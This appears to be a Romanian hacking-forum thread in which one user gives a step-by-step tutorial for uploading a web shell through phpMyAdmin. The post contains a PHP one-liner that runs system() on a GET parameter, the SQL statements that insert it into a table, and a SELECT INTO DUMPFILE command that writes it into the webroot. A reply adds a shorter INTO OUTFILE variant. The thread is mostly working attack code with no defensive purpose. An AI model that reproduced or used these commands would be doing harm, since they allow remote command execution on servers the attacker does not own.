Kalashnikov. Posted March 9, 2014 Report Share Posted March 9, 2014 Deci.. ai acces la phpmyadmin si vrei sa uploadezi un shellInainte de toate, trebuie sa afli webroot (calea), un exemplu:/home/r00t/public_html/phpmyadmin/index.phpPoti gasi calea cu un fpd (easy-way).Trebuie sa creeam un tabel, folosim sql:CREATE TABLE `upload_db`.`form` ( `track1` VARCHAR( 1000 ) NOT NULL ) ENGINE = MYISAM ;Introducem un cod in tabel:INSERT INTO form VALUE ('some shell code here');Pentru acest exemplu, voi uploada un script:<?php if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;} ?>comanda mea trebuie sa arate, ceva in genu:INSERT INTO form VALUES ('<?php if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;} ?>');Cu urmatoarea comanda, ii spunem serverului mysql sa exporte continutul tabelului intr-un fisier sa il putem executaSELECT * INTO dumpfile '/path/to/web/page.php' FROM upload_dbcomanda mea, ar trebui sa arate asa:SELECT * INTO dumpfile '/home/r00t/public_html/shell.php' FROM upload_db 1 Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted March 9, 2014 Active Members Report Share Posted March 9, 2014 Nu trebuie sa te mai chinui sa faci tabel separat (util pentru cazul in care nu ai permisiuni sa o poti face), poti direct cu DUAL tableSELECT '<?php code here ?>' INTO OUTFILE '/../x.php' FROM DUALInsa asta cu INTO OUTFILE / DUMPFILE nu ar trebui sa mearga pe un normal user, n-ar trebui sa aibe permisii la FILE_PRIV un user normal, poate doar de pe root.Merge si fara dualselect 'cod_php' INTO OUTFILE '/var/www/a.php'sau DUMPFILE. Quote Link to comment Share on other sites More sharing options...
Maximus Posted May 31, 2014 Report Share Posted May 31, 2014 Spui ca e tutorialul tau nu ? Uploading a shell via phpmyadmin Quote Link to comment Share on other sites More sharing options...
